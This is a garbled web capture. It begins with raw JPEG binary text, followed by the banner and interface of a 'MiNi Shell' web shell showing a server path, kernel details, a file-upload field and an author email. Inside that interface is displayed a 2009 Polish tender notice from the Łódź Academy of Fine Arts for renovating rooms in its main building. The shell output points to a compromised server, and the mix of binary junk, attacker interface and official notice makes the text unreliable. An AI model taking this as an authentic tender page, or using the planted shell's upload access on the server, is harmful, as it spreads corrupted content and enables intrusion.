JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090422/115816-N-2009.html

<p class="kh_header"><b>Łódź: Remont pomieszczeń w budynku głównym ASP</b><br>
<b>Numer ogłoszenia: 115816 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi , ul. Wojska Polskiego 121, 91-726 Łódź, woj. łódzkie, tel. 042 2547408, centrala 2547598, faks 042 2547418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w budynku głównym ASP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest remont wybranych pomieszczeń w budynku głównym ASP w Łodzi przy ul. Wojska Polskiego 121.
2)	Remont, w zakresie określonym w książce przedmiarów obejmuje: 
a)	Roboty tynkowe i malarskie ścian i sufitów
b)	Remont posadzek (ułożenie terakoty)
c)	Układanie glazury na ścianach,
d)	Remont sanitariatów,
3)	Obmiar robót według książki przedmiarów załączonej do siwz.
4)	Prace remontowe należy wykonać z należytą starannością.
5)	Wykonawca, który wygra przedmiotowe postępowanie zobowiązany będzie, podczas realizacji prac remontowych każdorazowo uzgadniać z zamawiającym:
a)	Kolorystykę pomieszczenia, 
b)	Wybór płytek ściennych i podłogowych,
c)	Wybór armatury sanitarnej i baterii..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 45.53.00.00-7, 45.43.00.00-0, 45.43.10.00-7, 45.43.21.12-2, 45.44.20.00-7, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:24.000 PLN (słownie: dwadzieścia cztery tysiące złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Nie podlega wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych - złoży stosowne oświadczenie 
2. Wykaże, że posiada uprawnienia do wykonywania przedmiotowego zamówienia. Wykonawca spełni ten warunek, jeżeli złoży:
2.1. aktualny odpis z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem z datą wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wykaże, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a także znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca spełni ten warunek, jeżeli złoży: 
3.1. Wykaz potwierdzający, że Wykonawca w ciągu ostatnich pięciu lat, a jeżeli okres pro-wadzenia działalności jest krótszy - w tym okresie, wykonał (tj. wybudował lub wyremontował) co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, każda o średniorocznej wartości netto co najmniej 800.000,- PLN (osiemset tysięcy) i przy z zachowaniu, że prace te (o wartości wykazywanej) dotyczyły przede wszystkim: (1) położenia na ścianach gładzi gipsowej metodą tradycyjną o pow. nie mniejszej niż 5.000 m2 i (2) ułożenia posadzek z płytek podłogowych lub terakoty o powierzchni nie mniejszej niż 4.500 m2 . W wykazie, na formularzu stanowiącym załącznik do siwz należy podać min. nazwę inwestora, wraz z nr tel. osoby uprawnionej do kontaktu, oraz opisaniem zakresu robót, podaniem ich wartości i powierzchni, a także daty i miejsca wykonania. 
3.2. Kserokopie dokumentów potwierdzających wykonanie zamówień wymienionych w wykazie zrealizowanych robót. By zamawiający uznał dokumenty za kompletne i wystarczające winny zawierać następujące informacje: -wartość robót netto lub/i brutto, opis wykonanych prac z wyszczególnieniem powierzchni gładzi i płytek podłogowych, lub terakoty-zakres rzeczowy, datę rozpoczęcia i zakończenia prac oraz informację, że roboty te zostały wykonane należycie. 
3.3. Zatrudnia, co najmniej jednego pracownika posiadającego kwalifikacje umożliwiające pełnienie funkcji kierownika budowy w zakresie robót budowlanych wraz z aktualnym wpisem tego pracownika do samorządu zawodowego
3.4. Posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 800.000,- PLN.
3.5. Jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności, co najmniej na kwotę 800.000,- PLN na rok.
3.7. Udzieli gwarancji/rękojmi w zakresie przedmiotowego zadania na okres, co najmniej 36 miesięcy, liczony od dnia ostatecznego odbioru przedmiotu zamówienia.
3.8. Akceptuje warunki płatności określone w projekcie umowy, tj. wynagrodzenie płatne etapowo, w terminie 90 dni od daty otrzymania faktury, wystawionej po spisaniu bezusterkowego protokołu odbioru. 
3.9. Wykona zamówienie w terminie do 15 listopada 2009 r.
4. Wniesienie wadium w terminie i w odpowiedniej formie.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia / nie spełnia w oparciu o oświadczenia i dokumenty złożone przez Wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz OFERTA, gdzie Wykonawca oświadczy, czy:
1) Udzieli gwarancji/rękojmi w zakresie przedmiotowego zadania na okres, co najmniej 36 miesięcy, liczony od dnia ostatecznego odbioru przedmiotu zamówienia. 
2) Akceptuje warunki płatności określone w projekcie umowy, tj. wynagrodzenie płatne etapowo, w terminie 90 dni od daty otrzymania faktury, wystawionej po spisaniu bezusterkowego protokołu odbioru.
3) wykona zamówienie w terminie do 15 listopada 2009 r. od daty podpisania umowy.
2. Dołączy wypełniony kosztorys ofertowy ściśle według kosztorysu dołączonego do siwz.
3. Dołączy podpisany formularz oświadczeń, że Wykonawcy nie podlega wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 oraz spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich oddzielnie)
4. Dołączy wykaz potwierdzający, że Wykonawca w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (tj. wybudował lub wyremontował) co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, każda o średniorocznej wartości netto co najmniej 800.000,- PLN (osiemset tysięcy) i przy z zachowaniu, że prace te (o wartości wykazywanej) dotyczyły przede wszystkim: (1) położenia na ścianach gładzi gipsowej metodą tradycyjną o pow. nie mniejszej niż 5.000 m2 i (2) ułożenia posadzek z płytek podłogowych lub terakoty o powierzchni nie mniejszej niż 4.500 m2 . W wykazie, na formularzu stanowiącym załącznik do siwz należy podać min. nazwę inwestora, wraz z nr tel. osoby uprawnionej do kontaktu, oraz opisaniem zakresu robót, podaniem ich wartości i powierzchni, a także daty i miejsca wykonania.
 (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie)
5. Dołączy kserokopie dokumentów potwierdzających wykonanie zamówień wymienionych w wykazie zrealizowanych robót. By zamawiający uznał dokumenty za kompletne i wystarczające winny zawierać następujące informacje: -wartość robót netto lub/i brutto, opis wykonanych prac z wyszczególnieniem powierzchni gładzi i płytek podłogowych, lub terakoty-zakres rzeczowy, datę rozpoczęcia i zakończenia prac oraz informację, że roboty te zostały wykonane należycie.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie)
6. Kserokopię uprawnień, co najmniej jednego pracownika, który posiada kwalifikacje umożliwiające mu pełnienie funkcji kierownika budowy w zakresie robót budowlanych wraz z aktualnym wpisem tego pracownika do samorządu zawodowego.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie)
7. Kserokopię, poświadczoną za zgodność z oryginałem przez prawnego reprezentanta firmy, aktualnego odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej potwierdzającą dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem oraz zawierający nazwisko osoby uprawnionej do reprezentowania firmy z datą wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich oddzielnie)
a) W przypadku spółki z o.o. załączyć należy kserokopię stosownego dokumentu upoważniającego zarząd do zaciągania zobowiązań przekraczających 2-krotność kapitału założycielskiego (art. 230 w związku z art. 17 Kodeksu Spółek Handlowych). 
Jeżeli spółka nie posiada takiej uchwały na tym etapie może dostarczyć ją później, przed podpisaniem umowy - w przypadku, gdy Wykonawca wygra przetarg.
b) W przypadku spółki cywilnej - należy załączyć kserokopię umowy spółki.
8. Dowód wniesienia wadium w zależności od formy, jeśli wniesiono wadium w pieniężne - kserokopię przelewu, jeśli wniesiono wadium w innej formie - należy załączyć do oferty dokument wadialny w oryginale.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie)
9. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 800.000,- PLN, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie)
10. Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej (kontraktowej i deliktowej) w zakresie prowadzonej działalności, co najmniej na kwotę 800.000,- PLN na rok.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniany będzie łącznie).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.asp.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.asp.lodz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 11:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego, w Kancelarii, pok. 501, V piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com